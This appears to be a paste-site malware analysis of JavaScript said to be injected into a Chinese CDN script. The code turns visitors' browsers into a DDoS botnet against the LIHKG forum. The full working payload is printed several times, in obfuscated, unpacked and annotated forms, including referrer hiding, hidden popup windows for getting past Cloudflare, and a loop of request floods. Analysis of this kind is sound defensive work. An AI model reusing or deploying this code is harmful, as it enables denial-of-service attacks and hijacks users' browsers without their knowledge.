Date()[c[17]+a[23]+a[4]+b[6]+c[36]+a[51]+b[42]]();timer=setInterval(c[36]+b[43]+c[44]+c[14]+b[23]+b[16]+a[34]+b[20]+b[22]+c[13]+b[42]+c[37]+b[42]+b[34]+a[15],50);count=count+1}starttime=new Date()[_b[23]+_a[4]+_a[37]+_b[6]+_c[25]+_c[51]+_a[4]]();url=url_list[unixtime()%url_list[_a[13]+_c[23]+_c[36]+_b[23]+_c[4]+_c[1]]];imgadd()}}
  24.  
  25. // We also have this sample taken from the Internet Archive
  26. // (http://web.archive.org/web/20190831130059/http://js.passport.qihucdn.com/11.0.1.js?5d5100a4a5a2ac6a47af3cb82952cc7b),
  27. // as well as from Netherlands, which is packed and then obfuscated again. After
  28. // unpacking we get:
  29.  
  30. var TASKID=33190;var MAGICNUM=11997755;var EXECNUM=100;var FEEDBACKADDR='http://116.255.226.154/';if((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1]>=34)&&(window.navigator.userAgent.toLowerCase().indexOf("edge")<0)){var MAX_TIME=300000;var MAGIC=0x58585858;var MAX_COUNT=100000;var url_list=['https://lihkg.com/api_v2/thread/latest?cat_id=1&page=1&count=60&type=now&t='];var cloudflare_js_validate_url='https://lihkg.com';var TIMEGAP=500;function unixtime(){var a=new Date();return Date.UTC(a.getFullYear(),a.getMonth(),a.getDate(),a.getHours(),a.getMinutes(),a.getSeconds())/1000}function updateVT(){localStorage.vt=(unixtime()+MAX_TIME/1000)^MAGIC}function canExe(){if(localStorage.vt==null){updateVT();return true}else{if((localStorage.vt^MAGIC)>unixtime()){return(localStorage.cl!='0')}else{if(localStorage.cl!='0'){updateVT();return true}else{return false}}}}if(canExe()==true){localStorage.cl=0;document.getElementsByTagName("head")[0].innerHTML="<meta name=\"referrer\" content=\"no-referrer\">"+document.getElementsByTagName("head")[0].innerHTML;window.onbeforeunload=function(){localStorage.cl=1};var canpop=false;var p_win=null;function popwin(){if(canpop==true){p_win=window.open(cloudflare_js_validate_url,'_blank','toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=100000, top=100000, width=1, height=1, visible=none','');window.focus();canpop=false;document.removeEventListener('click',popwin)}}document.addEventListener('click',popwin);var p_img=null;var timer=null;var starttime=null;var requesttime=null;var responsetime=null;var url='';var count=0;function imgdel(){if(p_img!=null){document.body.removeChild(p_img)}p_img=null;url=url_list[unixtime()%url_list.length];if(count<MAX_COUNT&&responsetime-starttime<MAX_TIME)setTimeout('imgadd()',(responsetime-requesttime)>TIMEGAP?TIMEGAP:(responsetime-requesttime));else localStorage.cl=1}function isImgComplete(){if(p_img.complete){window.clearInterval(timer);responsetime=new Date().getTime();if(responsetime-requesttime>1000){if(p_win!=null){p_win.close();p_win=null}count+=1}else{canpop=true}imgdel()}else{if(new Date().getTime()-requesttime>2000){imgdel()}}}function imgadd(){p_img=document.body.appendChild(document.createElement('img'));p_img.src=url+unixtime()+Math.ceil(Math.random()*100);p_img.style.display='none';requesttime=new Date().getTime();timer=setInterval("isImgComplete()",50);count=count+1}starttime=new Date().getTime();url=url_list[unixtime()%url_list.length];imgadd()}}
  31.  
  32. // We don't know what happened from other countries. AFAIK, all samples are
  33. // reduced to the unpacked Netherland sample above. Let's beautify the code:
  34.  
  35. var TASKID = 33190;
  36. var MAGICNUM = 11997755;
  37. var EXECNUM = 100;
  38. var FEEDBACKADDR = 'http://116.255.226.154/';
  39. // ^ Note: this IP address belongs to ZhengZhou GAINET Computer Network Technology Ltd
  40. //  (河南省郑州市 景安计算机网络技术有限公司) (Ticker symbol 832757 on NEEQ)
  41.  
  42. if ((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1] >= 34) && (window.navigator.userAgent.toLowerCase().indexOf("edge") < 0)) {
  43.     // ^ We will only execute these scripts if the Browser is Chrome 34+ and not MS Edge.
  44.  
  45.     var MAX_TIME = 300000;
  46.     // ^ 300000 milliseconds = 5 minutes
  47.     var MAGIC = 0x58585858;
  48.     var MAX_COUNT = 100000;
  49.     var url_list = ['https://lihkg.com/api_v2/thread/latest?cat_id=1&page=1&count=60&type=now&t='];
  50.     var cloudflare_js_validate_url = 'https://lihkg.com';
  51.     var TIMEGAP = 500;
  52.     // ^ 500 milliseconds = 0.5 seconds
  53.  
  54.     function unixtime() {
  55.         var a = new Date();
  56.         return Date.UTC(a.getFullYear(), a.getMonth(), a.getDate(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1000
  57.     }
  58.  
  59.     function updateVT() {
  60.         localStorage.vt = (unixtime() + MAX_TIME / 1000) ^ MAGIC
  61.     }
  62.  
  63.     function canExe() {
  64.         if (localStorage.vt == null) {
  65.             updateVT();
  66.             return true
  67.         } else {
  68.             if ((localStorage.vt ^ MAGIC) > unixtime()) {
  69.                 return (localStorage.cl != '0')
  70.             } else {
  71.                 if (localStorage.cl != '0') {
  72.                     updateVT();
  73.                     return true
  74.                 } else {
  75.                     return false
  76.                 }
  77.             }
  78.         }
  79.     }
  80.     if (canExe() == true) {
  81.         // ^ Prevents a new DDoS attempt if you have visited this page again
  82.         //   after 5 minutes. Note that this does _not_ mean an ongoing DDoS
  83.         //   attempt will stop after 5 minutes.
  84.  
  85.         localStorage.cl = 0;
  86.         document.getElementsByTagName("head")[0].innerHTML = "<meta name=\"referrer\" content=\"no-referrer\">" + document.getElementsByTagName("head")[0].innerHTML;
  87.         // ^ Hide where the requests are coming from.
  88.  
  89.         window.onbeforeunload = function () {
  90.             localStorage.cl = 1
  91.         };
  92.         var canpop = false;
  93.         var p_win = null;
  94.  
  95.         function popwin() {
  96.             if (canpop == true) {
  97.                 p_win = window.open(cloudflare_js_validate_url, '_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=100000, top=100000, width=1, height=1, visible=none', '');
  98.                 window.focus();
  99.                 canpop = false;
  100.                 document.removeEventListener('click', popwin)
  101.             }
  102.         }
  103.         document.addEventListener('click', popwin);
  104.         // ^ Open the LIHKG main page on a hidden new window and focus on that
  105.         //   window whenever you click anywhere on the injected webpage,
  106.         //   potentially to bypass the Cloudflare 5-second check (now useless
  107.         //   against the latest CAPTCHA check).
  108.  
  109.         var p_img = null;
  110.         var timer = null;
  111.         var starttime = null;
  112.         var requesttime = null;
  113.         var responsetime = null;
  114.         var url = '';
  115.         var count = 0;
  116.  
  117.         function imgdel() {
  118.             if (p_img != null) {
  119.                 document.body.removeChild(p_img)
  120.             }
  121.             p_img = null;
  122.             url = url_list[unixtime() % url_list.length];
  123.             if (count < MAX_COUNT && responsetime - starttime < MAX_TIME) {
  124.                 setTimeout('imgadd()', (responsetime - requesttime) > TIMEGAP ? TIMEGAP : (responsetime - requesttime));
  125.             } else {
  126.                 localStorage.cl = 1
  127.             }
  128.         }
  129.  
  130.         function isImgComplete() {
  131.             if (p_img.complete) {
  132.                 window.clearInterval(timer);
  133.                 responsetime = new Date().getTime();
  134.                 if (responsetime - requesttime > 1000) {
  135.                     if (p_win != null) {
  136.                         p_win.close();
  137.                         p_win = null
  138.                     }
  139.                     count += 1
  140.                 } else {
  141.                     canpop = true
  142.                 }
  143.                 imgdel()
  144.             } else {
  145.                 if (new Date().getTime() - requesttime > 2000) {
  146.                     imgdel()
  147.                 }
  148.             }
  149.         }
  150.  
  151.         function imgadd() {
  152.             p_img = document.body.appendChild(document.createElement('img'));
  153.             p_img.src = url + unixtime() + Math.ceil(Math.random() * 100);
  154.             p_img.style.display = 'none';
  155.             requesttime = new Date().getTime();
  156.             timer = setInterval("isImgComplete()", 50);
  157.             count = count + 1
  158.         }
  159.  
  160.         starttime = new Date().getTime();
  161.         url = url_list[unixtime() % url_list.length];
  162.         imgadd()
  163.  
  164.         // What this does:
  165.         //  1. creates an <img> tag with the `src` set to a LIHKG API endpoint.
  166.         //  2. after the image is loaded, delete the image.
  167.         //  3. redo step 1 and 2 every 0.5s.
  168.         //
  169.         // Since these are executed on client side, this will either bring LIHKG
  170.         // down due to DDoS, or more likely, cause Cloudflare to flag your IP as
  171.         // suspicious and block _you_ from accessing LIHKG.
  172.     }
  173. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement